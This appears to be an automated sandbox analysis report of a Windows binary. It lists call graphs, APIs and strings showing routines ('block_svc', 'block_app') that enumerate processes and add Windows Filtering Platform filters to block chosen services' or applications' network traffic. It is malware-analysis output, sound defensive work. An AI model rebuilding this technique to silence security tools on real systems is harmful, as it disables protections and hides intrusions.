7ff73afb6bac 9440->9442 9445 7ff73afb14e2 12 API calls 9441->9445 9443 7ff73afb6bb1 9442->9443 9444 7ff73afb6c12 9442->9444 9447 7ff73afb6c42 9443->9447 9448 7ff73afb6bba 9443->9448 9446 7ff73afb14e2 12 API calls 9444->9446 9451 7ff73afb6bc7 9445->9451 9446->9451 9449 7ff73afb14e2 12 API calls 9447->9449 9453 7ff73afb6a5c 9448->9453 9449->9451 9451->9287 9451->9290 9454 7ff73afb6b05 9453->9454 9455 7ff73afb6a76 9453->9455 9456 7ff73afb14e2 12 API calls 9454->9456 9457 7ff73afb6a7f 9455->9457 9458 7ff73afb6b35 9455->9458 9466 7ff73afb6ac1 9456->9466 9459 7ff73afb6b68 9457->9459 9460 7ff73afb6a88 GetModuleFileNameA GetLastError 9457->9460 9461 7ff73afb14e2 12 API calls 9458->9461 9463 7ff73afb14e2 12 API calls 9459->9463 9462 7ff73afb6aa2 9460->9462 9461->9466 9464 7ff73afb6afa 9462->9464 9465 7ff73afb14e2 12 API calls 9462->9465 9463->9466 9464->9451 9465->9466 9467 7ff73afb14e2 12 API calls 9466->9467 9467->9464 9469 7ff73afb4675 9468->9469 9470 7ff73afb45f7 9468->9470 9473 7ff73afb14e2 12 API calls 9469->9473 9471 7ff73afb4600 9470->9471 9472 7ff73afb46ba 9470->9472 9475 7ff73afb4610 fopen 9471->9475 9476 7ff73afb46ed 9471->9476 9474 7ff73afb14e2 12 API calls 9472->9474 9485 7ff73afb46b0 9473->9485 9474->9485 9477 7ff73afb4720 _errno 9475->9477 9478 7ff73afb462b fseek 9475->9478 9479 7ff73afb14e2 12 API calls 9476->9479 9480 7ff73afb14e2 12 API calls 9477->9480 9481 7ff73afb4646 _errno 9478->9481 9482 7ff73afb47f3 9478->9482 9479->9485 9483 7ff73afb4742 _errno 9480->9483 9484 7ff73afb14e2 12 API calls 9481->9484 9490 7ff73afb4802 9482->9490 9491 7ff73afb482b _errno 9482->9491 9486 7ff73afb478f _errno 9483->9486 9487 7ff73afb474b 9483->9487 9488 7ff73afb4668 _errno 9484->9488 9489 7ff73afb14e2 12 API calls 9485->9489 9493 7ff73afb481e 9486->9493 9487->9486 9488->9469 9492 7ff73afb47da _errno 9488->9492 9494 7ff73afb4b78 9489->9494 9490->9493 9498 7ff73afb48b3 fseek 9490->9498 9495 7ff73afb14e2 12 API calls 9491->9495 9492->9493 9496 7ff73afb4b35 9493->9496 9497 7ff73afb4b2d fclose 9493->9497 9494->9354 9494->9362 9499 7ff73afb484d _errno 9495->9499 9496->9485 9500 7ff73afb4ba2 9496->9500 9497->9496 9504 7ff73afb4941 _errno 9498->9504 9505 7ff73afb48cd 9498->9505 9502 7ff73afb4856 9499->9502 9503 7ff73afb489a _errno 9499->9503 9501 7ff73afb14e2 12 API calls 9500->9501 9501->9494 9502->9503 9503->9493 9506 7ff73afb14e2 12 API calls 9504->9506 9507 7ff73afb49c9 GetProcessHeap HeapAlloc 9505->9507 9522 7ff73afb48df 9505->9522 9508 7ff73afb4963 _errno 9506->9508 9509 7ff73afb49f1 9507->9509 9507->9522 9510 7ff73afb49b0 _errno 9508->9510 9511 7ff73afb496c 9508->9511 9512 7ff73afb14e2 12 API calls 9509->9512 9510->9493 9511->9510 9514 7ff73afb4a07 9512->9514 9513 7ff73afb4a9e 9516 7ff73afb4aa9 9513->9516 9517 7ff73afb14e2 12 API calls 9513->9517 9514->9522 9515 7ff73afb490d fread 9515->9513 9515->9522 9516->9493 9519 7ff73afb4ab4 GetProcessHeap HeapFree 9516->9519 9517->9516 9518 7ff73afb4a0c _errno 9520 7ff73afb14e2 12 API calls 9518->9520 9519->9493 9521 7ff73afb4a2e _errno 9520->9521 9521->9522 9523 7ff73afb4a7b _errno 9521->9523 9522->9493 9522->9513 9522->9515 9522->9518 9522->9523 9523->9522 9525 7ff73afb1956 fclose 9524->9525 9526 7ff73afb195b 9524->9526 9525->9526 9527 7ff73afb1983 DeleteCriticalSection 9526->9527 9528 7ff73afb1989 9526->9528 9527->9528 9529 7ff73afb14e2 12 API calls 9528->9529 9530 7ff73afb143c 9529->9530 9530->9249 9530->9250 9532 7ff73afb6272 9531->9532 9533 7ff73afb62e4 9531->9533 9534 7ff73afb627f UnlockFileEx 9532->9534 9535 7ff73afb6315 9532->9535 9536 7ff73afb14e2 12 API calls 9533->9536 9537 7ff73afb6372 GetLastError 9534->9537 9538 7ff73afb62b9 CloseHandle 9534->9538 9539 7ff73afb14e2 12 API calls 9535->9539 9542 7ff73afb630d 9536->9542 9540 7ff73afb14e2 12 API calls 9537->9540 9541 7ff73afb14e2 12 API calls 9538->9541 9539->9542 9540->9542 9543 7ff73afb62d8 9541->9543 9544 7ff73afb14e2 12 API calls 9542->9544 9543->9249 9544->9543 9546 7ff73afb7785 9545->9546 9547 7ff73afb7789 9546->9547 9548 7ff73afb77cd 9546->9548 9551 7ff73afb77ea 9547->9551 9554 7ff73afb77c6 9547->9554 9549 7ff73afb14e2 12 API calls 9548->9549 9550 7ff73afb77e3 9549->9550 9550->9262 9550->9263 9552 7ff73afb14e2 12 API calls 9551->9552 9553 7ff73afb7800 9552->9553 9555 7ff73afb7817 FwpmProviderDestroyEnumHandle0 9553->9555 9554->9553 9556 7ff73afb7865 wcscmp 9554->9556 9555->9550 9557 7ff73afb788a 9555->9557 9556->9554 9557->9550 9558 7ff73afb14e2 12 API calls 9557->9558 9558->9550 9621 7ff73afb9bb9 9559->9621 9562 7ff73afb9537 9563 7ff73afb9bb9 13 API calls 9562->9563 9566 7ff73afb9566 9563->9566 9564 7ff73afb960d 9564->9272 9566->9564 9568 7ff73afb14e2 12 API calls 9566->9568 9638 7ff73afba1f1 9566->9638 9644 7ff73afb929a inet_addr ntohl 9566->9644 9568->9566 9570 7ff73afb9bb9 13 API calls 9569->9570 9571 7ff73afb8599 9570->9571 9572 7ff73afb86c1 GetLastError 9571->9572 9573 7ff73afb85dc 9571->9573 9579 7ff73afb86df 9571->9579 9574 7ff73afb14e2 12 API calls 9572->9574 9575 7ff73afb87a3 GetLastError 9573->9575 9594 7ff73afb860e 9573->9594 9574->9579 9577 7ff73afb87b4 9575->9577 9575->9594 9576 7ff73afb8ca5 CloseHandle 9576->9579 9578 7ff73afb14e2 12 API calls 9577->9578 9578->9594 9579->9269 9580 7ff73afba1f1 17 API calls 9580->9594 9581 7ff73afb88cd OpenProcess 9583 7ff73afb8a78 GetLastError 9581->9583 9584 7ff73afb88ee QueryFullProcessImageNameW 9581->9584 9582 7ff73afb8669 Process32Next 9586 7ff73afb867d GetLastError 9582->9586 9582->9594 9587 7ff73afb14e2 12 API calls 9583->9587 9585 7ff73afb892e GetLastError 9584->9585 9584->9594 9588 7ff73afb14e2 12 API calls 9585->9588 9586->9594 9587->9594 9588->9594 9590 7ff73afb14e2 12 API calls 9590->9594 9591 7ff73afb8a13 CloseHandle 9591->9594 9592 7ff73afb86af 9592->9591 9593 7ff73afb14e2 12 API calls 9592->9593 9593->9592 9594->9576 9594->9580 9594->9581 9594->9582 9594->9590 9594->9591 9594->9592 9688 7ff73afb8153 9594->9688 9596 7ff73afb9bb9 13 API calls 9595->9596 9597 7ff73afb8d38 9596->9597 9606 7ff73afb9257 9597->9606 9751 7ff73afb1cf4 9597->9751 9600 7ff73afb8d82 9602 7ff73afb8d8a 9600->9602 9603 7ff73afb1c73 14 API calls 9600->9603 9604 7ff73afb8da9 FreeLibrary 9602->9604 9602->9606 9605 7ff73afb8dc6 9603->9605 9604->9606 9605->9606 9607 7ff73afb1c73 14 API calls 9605->9607 9606->9264 9608 7ff73afb8de3 9607->9608 9608->9606 9609 7ff73afb1c73 14 API calls 9608->9609 9610 7ff73afb8e00 9609->9610 9610->9606 9611 7ff73afb1c73 14 API calls 9610->9611 9617 7ff73afb8e18 9611->9617 9612 7ff73afba1f1 17 API calls 9612->9617 9613 7ff73afb8ecc strlen 9613->9617 9614 7ff73afb8f64 GetProcessHeap HeapAlloc 9614->9617 9615 7ff73afb14e2 12 API calls 9615->9617 9616 7ff73afb8fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 9616->9617 9617->9602 9617->9606 9617->9612 9617->9613 9617->9614 9617->9615 9617->9616 9619 7ff73afb90f2 GetProcessHeap HeapFree 9617->9619 9620 7ff73afb91dc LocalFree 9617->9620 9767 7ff73afb795a GetProcessHeap HeapAlloc 9617->9767 9619->9617 9620->9617 9622 7ff73afb9bd1 9621->9622 9623 7ff73afb9bec 9621->9623 9624 7ff73afb9c1f 9622->9624 9625 7ff73afb9bd6 9622->9625 9626 7ff73afb14e2 12 API calls 9623->9626 9628 7ff73afb14e2 12 API calls 9624->9628 9627 7ff73afb9c52 9625->9627 9631 7ff73afb9bdb 9625->9631 9630 7ff73afb9c15 9626->9630 9629 7ff73afb14e2 12 API calls 9627->9629 9628->9630 9629->9630 9636 7ff73afb14e2 12 API calls 9630->9636 9632 7ff73afb9cbc 9631->9632 9633 7ff73afb9c91 strcmp 9631->9633 9632->9630 9634 7ff73afb9cc3 9632->9634 9633->9631 9635 7ff73afb14e2 12 API calls 9634->9635 9637 7ff73afb9689 9635->9637 9636->9637 9637->9266 9637->9272 9637->9562 9639 7ff73afba200 9638->9639 9640 7ff73afba22c 9638->9640 9651 7ff73afba0f0 9639->9651 9641 7ff73afb14e2 12 API calls 9640->9641 9643 7ff73afba217 9641->9643 9643->9566 9645 7ff73afb937a 9644->9645 9646 7ff73afb932b 9644->9646 9648 7ff73afb14e2 12 API calls 9645->9648 9647 7ff73afb934f 9646->9647 9649 7ff73afb14e2 12 API calls 9646->9649 9647->9566 9650 7ff73afb952d 9648->9650 9649->9647 9652 7ff73afba112 9651->9652 9653 7ff73afba153 9651->9653 9663 7ff73afb9ed0 9652->9663 9655 7ff73afb14e2 12 API calls 9653->9655 9657 7ff73afba12b 9655->9657 9657->9643 9658 7ff73afba183 _errno 9659 7ff73afc0568 9658->9659 9660 7ff73afba1a5 _errno 9659->9660 9660->9657 9661 7ff73afba1b4 _errno 9660->9661 9662 7ff73afb14e2 12 API calls 9661->9662 9662->9657 9664 7ff73afb9ee1 9663->9664 9665 7ff73afb9f19 9663->9665 9667 7ff73afb9bb9 13 API calls 9664->9667 9666 7ff73afb14e2 12 API calls 9665->9666 9668 7ff73afb9ef8 9666->9668 9669 7ff73afb9ef4 9667->9669 9668->9657 9668->9658 9669->9668 9671 7ff73afb9d40 9669->9671 9672 7ff73afb9d73 9671->9672 9673 7ff73afb9d58 9671->9673 9674 7ff73afb14e2 12 API calls 9672->9674 9675 7ff73afb9da6 9673->9675 9676 7ff73afb9d5d 9673->9676 9686 7ff73afb9d9c 9674->9686 9678 7ff73afb14e2 12 API calls 9675->9678 9677 7ff73afb9dd9 9676->9677 9684 7ff73afb9d62 9676->9684 9679 7ff73afb14e2 12 API calls 9677->9679 9678->9686 9679->9686 9680 7ff73afb9e3b 9681 7ff73afb9e44 9680->9681 9680->9686 9683 7ff73afb14e2 12 API calls 9681->9683 9682 7ff73afb9e18 strcmp 9682->9684 9685 7ff73afb9e69 9683->9685 9684->9680 9684->9682 9685->9668 9687 7ff73afb14e2 12 API calls 9686->9687 9687->9685 9711 7ff73afb8008 GetFileAttributesW 9688->9711 9691 7ff73afb8192 wcslen 9728 7ff73afb7102 9691->9728 9694 7ff73afb82b9 FwpmFilterAdd0 9696 7ff73afb8461 9694->9696 9697 7ff73afb84ce FwpmFilterAdd0 9694->9697 9695 7ff73afb8239 FwpmFilterDeleteByKey0 9698 7ff73afb825a 9695->9698 9699 7ff73afb8277 FwpmFilterDeleteByKey0 9695->9699 9700 7ff73afb14e2 12 API calls 9696->9700 9701 7ff73afb8540 9697->9701 9702 7ff73afb8474 9697->9702 9703 7ff73afb14e2 12 API calls 9698->9703 9704 7ff73afb829c 9699->9704 9708 7ff73afb8182 9699->9708 9700->9702 9707 7ff73afb14e2 12 API calls 9701->9707 9705 7ff73afb84a1 9702->9705 9706 7ff73afb848a GetProcessHeap HeapFree 9702->9706 9703->9708 9709 7ff73afb14e2 12 API calls 9704->9709 9705->9708 9710 7ff73afb84b2 GetProcessHeap HeapFree 9705->9710 9706->9705 9707->9702 9708->9594 9709->9708 9710->9708 9712 7ff73afb8149 9711->9712 9713 7ff73afb8028 9711->9713 9734 7ff73afb7e04 9713->9734 9715 7ff73afb803b 9716 7ff73afb8041 9715->9716 9717 7ff73afb804f GetProcessHeap HeapAlloc 9715->9717 9716->9691 9716->9708 9718 7ff73afb8071 9717->9718 9719 7ff73afb80d9 9717->9719 9718->9716 9720 7ff73afb807b wcslen GetProcessHeap HeapAlloc 9718->9720 9721 7ff73afb14e2 12 API calls 9719->9721 9722 7ff73afb80f7 9720->9722 9723 7ff73afb80bb 9720->9723 9721->9718 9726 7ff73afb14e2 12 API calls 9722->9726 9724 7ff73afb810f 9723->9724 9725 7ff73afb80c7 memcpy 9723->9725 9724->9716 9727 7ff73afb8114 GetProcessHeap HeapFree 9724->9727 9725->9716 9726->9723 9727->9716 9729 7ff73afb711d 9728->9729 9730 7ff73afb710b 9728->9730 9731 7ff73afb14e2 12 API calls 9729->9731 9732 7ff73afb14e2 12 API calls 9730->9732 9733 7ff73afb7110 9730->9733 9731->9733 9732->9733 9733->9694 9733->9695 9735 7ff73afb7e59 9734->9735 9736 7ff73afb7e6f QueryDosDeviceW 9735->9736 9741 7ff73afb7e5f 9735->9741 9737 7ff73afb7e90 GetLastError 9736->9737 9738 7ff73afb7f6c 9736->9738 9739 7ff73afb14e2 12 API calls 9737->9739 9742 7ff73afb7de7 9738->9742 9739->9741 9741->9715 9745 7ff73afbb270 9742->9745 9746 7ff73afbb295 9745->9746 9747 7ff73afbb27e 9745->9747 9749 7ff73afbdadd 12 API calls 9746->9749 9748 7ff73afbdadd 12 API calls 9747->9748 9750 7ff73afb7dff 9748->9750 9749->9750 9750->9741 9752 7ff73afb1d02 LoadLibraryA 9751->9752 9753 7ff73afb1d2b 9751->9753 9754 7ff73afb1d10 9752->9754 9755 7ff73afb1d2e GetLastError 9752->9755 9753->9755 9756 7ff73afb14e2 12 API calls 9754->9756 9757 7ff73afb14e2 12 API calls 9755->9757 9758 7ff73afb1d29 9756->9758 9757->9758 9758->9600 9759 7ff73afb1c73 9758->9759 9760 7ff73afb1cc1 9759->9760 9761 7ff73afb1c90 GetProcAddress 9759->9761 9763 7ff73afb1cc6 GetLastError 9760->9763 9762 7ff73afb1ca1 9761->9762 9761->9763 9764 7ff73afb14e2 12 API calls 9762->9764 9765 7ff73afb14e2 12 API calls 9763->9765 9766 7ff73afb1cbf 9764->9766 9765->9766 9766->9600 9768 7ff73afb79a1 9767->9768 9769 7ff73afb7c4f 9767->9769 9770 7ff73afb7102 12 API calls 9768->9770 9771 7ff73afb14e2 12 API calls 9769->9771 9772 7ff73afb79b1 9770->9772 9779 7ff73afb7c3b 9771->9779 9773 7ff73afb7a46 9772->9773 9774 7ff73afb7c6c FwpmFilterDeleteByKey0 9772->9774 9780 7ff73afb7b20 FwpmFilterAdd0 9773->9780 9775 7ff73afb7ca7 FwpmFilterDeleteByKey0 9774->9775 9776 7ff73afb7c8d 9774->9776 9778 7ff73afb7cd2 9775->9778 9775->9779 9777 7ff73afb14e2 12 API calls 9776->9777 9777->9779 9781 7ff73afb14e2 12 API calls 9778->9781 9779->9617 9782 7ff73afb7cef FwpmFilterAdd0 9780->9782 9783 7ff73afb7c07 9780->9783 9781->9779 9785 7ff73afb7d5d 9782->9785 9784 7ff73afb14e2 12 API calls 9783->9784 9786 7ff73afb7c1a 9784->9786 9787 7ff73afb14e2 12 API calls 9785->9787 9786->9779 9788 7ff73afb7c24 GetProcessHeap HeapFree 9786->9788 9789 7ff73afb7d7a 9787->9789 9788->9779 10380 7ff73afbad0e 10381 7ff73afbad13 signal 10380->10381 10382 7ff73afbad25 signal 10381->10382 10383 7ff73afbaca1 10381->10383 10382->10383 10713 7ff73afbdc0b 10714 7ff73afbccd9 2 API calls 10713->10714 10719 7ff73afbdb86 10714->10719 10715 7ff73afbe2e0 10716 7ff73afbe301 10715->10716 10717 7ff73afbccd9 2 API calls 10715->10717 10717->10716 10718 7ff73afbccd9 fputwc fwprintf 10718->10719 10719->10715 10719->10718 10720 7ff73afbcacd 10 API calls 10719->10720 10720->10719

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 85 7ff73afb8cfc-7ff73afb8d3f call 7ff73afb9bb9 88 7ff73afb927f 85->88 89 7ff73afb8d45-7ff73afb8d47 85->89 90 7ff73afb9284-7ff73afb9299 88->90 89->90 91 7ff73afb8d4d-7ff73afb8d59 89->91 91->90 92 7ff73afb8d5f-7ff73afb8d71 call 7ff73afb1cf4 91->92 95 7ff73afb8d91-7ff73afb8d97 92->95 96 7ff73afb8d73-7ff73afb8d7d call 7ff73afb1c73 92->96 98 7ff73afb8d9c-7ff73afb8d9e 95->98 99 7ff73afb8d82-7ff73afb8d88 96->99 100 7ff73afb8da0-7ff73afb8da3 98->100 101 7ff73afb8db7-7ff73afb8dce call 7ff73afb1c73 98->101 99->98 103 7ff73afb8d8a-7ff73afb8d8f 99->103 100->90 104 7ff73afb8da9-7ff73afb8db2 FreeLibrary 100->104 106 7ff73afb8dd4-7ff73afb8deb call 7ff73afb1c73 101->106 107 7ff73afb9257 101->107 103->100 104->90 109 7ff73afb9261 106->109 111 7ff73afb8df1-7ff73afb8e03 call 7ff73afb1c73 106->111 107->109 112 7ff73afb926b 109->112 111->112 116 7ff73afb8e09-7ff73afb8e20 call 7ff73afb1c73 111->116 115 7ff73afb9275 112->115 115->88 116->115 119 7ff73afb8e26-7ff73afb8e2c 116->119 120 7ff73afb8e76-7ff73afb8e82 119->120 120->100 121 7ff73afb8e88-7ff73afb8e8a 120->121 121->100 122 7ff73afb8e90-7ff73afb8eca call 7ff73afba1f1 121->122 125 7ff73afb8e72 122->125 126 7ff73afb8ecc-7ff73afb8f29 strlen 122->126 125->120 128 7ff73afb8f2f-7ff73afb8f5e 126->128 129 7ff73afb8e2e-7ff73afb8e49 call 7ff73afb14e2 126->129 133 7ff73afb8f64-7ff73afb8f8d GetProcessHeap HeapAlloc 128->133 134 7ff73afb8e4b-7ff73afb8e5e call 7ff73afb14e2 128->134 129->125 136 7ff73afb90a4-7ff73afb90c4 call 7ff73afb14e2 133->136 137 7ff73afb8f93-7ff73afb8fac 133->137 140 7ff73afb8e63-7ff73afb8e6b 134->140 136->140 143 7ff73afb8fb2-7ff73afb9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 137->143 144 7ff73afb90c9-7ff73afb90df call 7ff73afb14e2 137->144 140->125 145 7ff73afb91a9-7ff73afb91da call 7ff73afb795a 143->145 146 7ff73afb906d-7ff73afb9086 call 7ff73afb14e2 143->146 151 7ff73afb90e4-7ff73afb90ec 144->151 155 7ff73afb91ef-7ff73afb9200 call 7ff73afb14e2 145->155 156 7ff73afb91dc-7ff73afb91ea LocalFree 145->156 157 7ff73afb910e-7ff73afb9114 146->157 158 7ff73afb908c 146->158 151->140 154 7ff73afb90f2-7ff73afb9109 GetProcessHeap HeapFree 151->154 154->140 166 7ff73afb9205 155->166 156->151 159 7ff73afb9211-7ff73afb9216 157->159 160 7ff73afb911a-7ff73afb9120 157->160 162 7ff73afb9092-7ff73afb909f 158->162 163 7ff73afb919f-7ff73afb91a4 158->163 159->151 164 7ff73afb9122-7ff73afb9125 160->164 165 7ff73afb9153-7ff73afb9159 160->165 162->136 163->151 167 7ff73afb9140-7ff73afb9146 164->167 168 7ff73afb9127-7ff73afb912a 164->168 169 7ff73afb915f-7ff73afb9165 165->169 170 7ff73afb9239-7ff73afb923e 165->170 166->156 173 7ff73afb922f-7ff73afb9234 167->173 174 7ff73afb914c-7ff73afb9151 167->174 171 7ff73afb9130-7ff73afb9133 168->171 172 7ff73afb921b-7ff73afb9220 168->172 175 7ff73afb9243-7ff73afb9248 169->175 176 7ff73afb916b-7ff73afb9171 169->176 170->151 177 7ff73afb9225-7ff73afb922a 171->177 178 7ff73afb9139-7ff73afb913e 171->178 172->151 173->151 174->151 175->151 179 7ff73afb9177-7ff73afb917c 176->179 180 7ff73afb924d-7ff73afb9252 176->180 177->151 178->151 179->151 180->151
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
    • String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
    • API String ID: 3039259412-1782951725
    • Opcode ID: f6c01cc81a6204911dc953d5d1d2a92a17cb2aa6101d68be7ffc53fd14f333aa
    • Instruction ID: 2f195d420a6f78bd84ced93363a329f5ef06466c8bdcabfc42c2a4cf2cccb00b
    • Opcode Fuzzy Hash: f6c01cc81a6204911dc953d5d1d2a92a17cb2aa6101d68be7ffc53fd14f333aa
    • Instruction Fuzzy Hash: A2D16129A0C783A1FB60AB51E4823B9E360FF84384F904472DA8D47795DF7DE985E760
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
    • String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
    • API String ID: 1025937399-1899507746
    • Opcode ID: 451e17b2126774e296031818a113e861369deb4a1fb95e9d8082199e12eb9c46
    • Instruction ID: 791aa248b5f48bf6f768ce1002fd20922d2b31bb2b393cfdea6caf4ead9b2e04
    • Opcode Fuzzy Hash: 451e17b2126774e296031818a113e861369deb4a1fb95e9d8082199e12eb9c46
    • Instruction Fuzzy Hash: FBF1399EF0C713B2FA707614A4C23BC9261AFC9754FD004B2C64E066D5CE6DEC85B6A6

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
    • String ID:
    • API String ID: 3714283218-0
    • Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
    • Instruction ID: 71ea4997a95e2493c735257ea57223191fa3145fa9e3a2453d405c591afe1951
    • Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
    • Instruction Fuzzy Hash: 6E516E2DE08707AAFB51BB12D852279A3A5BF44B84F8449B5CD4E473A6DF3CE441A320

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 7ff73afb45d5-7ff73afb45f1 1 7ff73afb4687-7ff73afb46b5 call 7ff73afb14e2 0->1 2 7ff73afb45f7-7ff73afb45fa 0->2 10 7ff73afb4b39-7ff73afb4b4a 1->10 3 7ff73afb4600-7ff73afb4604 2->3 4 7ff73afb46ba-7ff73afb46e8 call 7ff73afb14e2 2->4 8 7ff73afb4610-7ff73afb4625 fopen 3->8 9 7ff73afb4606-7ff73afb460a 3->9 4->10 13 7ff73afb4720-7ff73afb4749 _errno call 7ff73afb14e2 _errno 8->13 14 7ff73afb462b-7ff73afb4640 fseek 8->14 9->8 12 7ff73afb46ed-7ff73afb471b call 7ff73afb14e2 9->12 19 7ff73afb4b53-7ff73afb4b60 10->19 20 7ff73afb4b4c 10->20 12->10 28 7ff73afb478f-7ff73afb47a3 _errno 13->28 29 7ff73afb474b-7ff73afb4758 13->29 17 7ff73afb4646-7ff73afb466f _errno call 7ff73afb14e2 _errno 14->17 18 7ff73afb47f3-7ff73afb4800 call 7ff73afc04e8 14->18 34 7ff73afb4675-7ff73afb4682 17->34 35 7ff73afb47da-7ff73afb47ee _errno 17->35 32 7ff73afb4802 18->32 33 7ff73afb482b-7ff73afb4854 _errno call 7ff73afb14e2 _errno 18->33 24 7ff73afb4b62-7ff73afb4b73 call 7ff73afb14e2 19->24 25 7ff73afb4b99-7ff73afb4ba0 19->25 20->19 37 7ff73afb4b78-7ff73afb4b8a 24->37 25->24 36 7ff73afb4b28-7ff73afb4b2b 28->36 29->28 38 7ff73afb4b23 32->38 39 7ff73afb4808-7ff73afb480d 32->39 49 7ff73afb4856-7ff73afb4863 33->49 50 7ff73afb489a-7ff73afb48ae _errno 33->50 34->1 35->36 41 7ff73afb4b35-7ff73afb4b37 36->41 42 7ff73afb4b2d-7ff73afb4b30 fclose 36->42 38->36 43 7ff73afb48b3-7ff73afb48cb fseek 39->43 44 7ff73afb4813-7ff73afb4818 39->44 41->10 46 7ff73afb4ba2-7ff73afb4bbb call 7ff73afb14e2 41->46 42->41 51 7ff73afb4941-7ff73afb496a _errno call 7ff73afb14e2 _errno 43->51 52 7ff73afb48cd-7ff73afb48d9 43->52 44->43 48 7ff73afb481e-7ff73afb4826 44->48 46->37 48->36 49->50 50->36 61 7ff73afb49b0-7ff73afb49c4 _errno 51->61 62 7ff73afb496c-7ff73afb4979 51->62 55 7ff73afb48df-7ff73afb48e5 52->55 56 7ff73afb49c9-7ff73afb49eb GetProcessHeap HeapAlloc 52->56 59 7ff73afb4b92-7ff73afb4b97 55->59 60 7ff73afb48eb 55->60 56->55 58 7ff73afb49f1-7ff73afb4a07 call 7ff73afb14e2 56->58 58->55 59->36 64 7ff73afb48f0-7ff73afb48ff 60->64 61->36 62->61 65 7ff73afb4905-7ff73afb4907 64->65 66 7ff73afb4a9e-7ff73afb4aa7 64->66 65->66 68 7ff73afb490d-7ff73afb4930 fread 65->68 69 7ff73afb4acf-7ff73afb4af2 call 7ff73afb14e2 66->69 70 7ff73afb4aa9-7ff73afb4aab 66->70 68->66 71 7ff73afb4936 68->71 73 7ff73afb4aad-7ff73afb4ab2 69->73 72 7ff73afb4af4-7ff73afb4af9 70->72 70->73 75 7ff73afb4a0c-7ff73afb4a35 _errno call 7ff73afb14e2 _errno 71->75 76 7ff73afb493c-7ff73afb493f 71->76 79 7ff73afb4b03-7ff73afb4b0c 72->79 80 7ff73afb4afb-7ff73afb4b01 72->80 73->36 77 7ff73afb4ab4-7ff73afb4acd GetProcessHeap HeapFree 73->77 83 7ff73afb4a37-7ff73afb4a44 75->83 84 7ff73afb4a7b-7ff73afb4a8f _errno 75->84 76->64 77->36 79->80 80->36 83->84 84->64
    APIs
    Strings
    Memory Dump Source
